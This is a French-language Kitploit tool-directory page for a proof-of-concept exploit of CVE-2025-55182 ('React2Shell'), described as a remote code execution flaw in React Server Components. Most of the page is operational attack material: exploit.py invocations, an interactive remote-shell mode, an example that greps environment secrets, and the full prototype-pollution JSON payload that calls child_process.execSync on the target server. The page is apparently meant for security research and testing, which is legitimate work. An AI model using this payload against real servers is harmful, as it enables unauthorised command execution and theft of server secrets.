Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
EXPLOIT-CVE-2025-55182 — Preuve de concept pour CVE-2025-55182 (React2Shell), une vulnérabilité RCE critique dans React Server Components via pollution de prototype. Inclut des modes d'exploitation interactif et en ligne de commande. | Kitploit
Outils/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed TeamingDéveloppement de Charges Utiles
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

Preuve de concept pour CVE-2025-55182 (React2Shell), une vulnérabilité RCE critique dans React Server Components via pollution de prototype. Inclut des modes d'exploitation interactif et en ligne de commande.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept CVE-2025-55182

CVE-2025-55182 React

Aperçu

Une démonstration pratique de CVE-2025-55182 (React2Shell) - une vulnérabilité critique RCE (exécution de code à distance) dans les composants serveur React.

Détails de la vulnérabilité

  • Identifiant CVE : CVE-2025-55182
  • Type : Exécution de code à distance via pollution de prototype
  • CVSS : 9.8 (CRITIQUE)
  • Versions affectées : React 19.0.0, 19.1.0, 19.1.1, 19.2.0

Vecteur d'attaque

Les composants serveur React désérialisent les FormData de manière non sécurisée. Des champs multipart spécialement conçus déclenchent une pollution de prototype et exécutent du code arbitraire via child_process.execSync.


Configuration rapide

root@kitploit:~
npm install
pip3 install requests
npm run dev

L'application s'exécute sur : http://localhost:3000


Exploitation

Utilisation de base

root@kitploit:~
python3 exploit.py -c "whoami"

Exemples de commandes

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

Mode interactif

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
COMMAND RESULT:
your-username
============================================================

> pwd
COMMAND RESULT:
/path/to/project
============================================================

> exit

Fonctionnement

Structure de la charge utile

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

Test

Terminal 1 : Démarrer le serveur

root@kitploit:~
npm run dev

Terminal 2 : Exécuter l'exploit

root@kitploit:~
python3 exploit.py -c "whoami"

Mode verbeux

root@kitploit:~
python3 exploit.py -c "whoami" -v

Affiche la structure complète de la charge utile et la réponse du serveur


Références

  • CVE-2025-55182 - NVD
  • React Security
  • OWASP Deserialization

Par Guaxinim | Recherche en cybersécurité

Télécharger l’outil